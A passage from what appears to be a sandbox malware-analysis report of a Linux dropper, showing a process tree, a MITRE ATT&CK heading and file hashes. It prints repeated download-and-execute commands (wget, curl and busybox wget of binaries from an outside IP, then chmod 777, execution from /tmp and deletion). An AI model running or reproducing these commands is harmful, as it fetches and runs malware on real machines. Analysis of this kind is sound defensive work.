/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:941
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:947
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:950
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:951
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:953
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:957
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:959
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:962
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:965
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:971
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:974
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:975
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:977
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:980
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97